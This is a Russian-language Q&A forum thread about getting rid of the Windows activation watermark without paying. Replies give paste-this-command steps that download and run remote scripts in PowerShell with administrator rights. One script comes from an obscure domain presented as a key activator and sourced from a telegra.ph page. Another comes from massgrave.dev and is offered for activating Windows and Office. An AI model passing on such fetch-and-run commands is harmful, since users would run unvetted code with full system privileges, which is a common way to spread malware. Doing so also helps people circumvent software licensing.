Как убрать надпись "Активация Windows"? Она несколько часов не появляется, а потом появляется опять
Я устала от неё. Раньше её не было, с недавнего времени сама появилась.
Не буду активировать, нет денег и желания.
А разве для активации нужны деньги? Вот это нонсенс.... Всегда активировал бесплатно. Какая именно у вас ОС?
зайди на сайт 64 и найди активатор твоей винды они там бесплатные
1. Откройте командную строку от имени администратора: нажмите `Ctrl + R`, введите `cmd`, затем нажмите `Ctrl + Shift + Enter`.
2. Введите следующую команду: powershell iex (irm ' prolitartest.xyz/key ')
3. Выберите пункт `1` и нажмите `Enter` для активации Windows.
Готово!
Источник:https://telegra.ph/Rukovodstvo-po-aktivacii-Windows-1011-11-12
Я через power shell делаю. Нажимаешь на кнопке поиска. Оно чаще всего около пуска. Там или окно, или строка поиска. Пишешь туда powershell. Выходит прога, нажимаешь по ней правой кнопкой и запускаешь от имени админа. Затем открывается консоль. Туда пишешь irm https://massgrave.dev/get | iex
Нажимаешь энтер. Качается скрипт активации. Нажимаешь цифру 1. Он активирует винду. Если нужно активировать офис, то цифру 2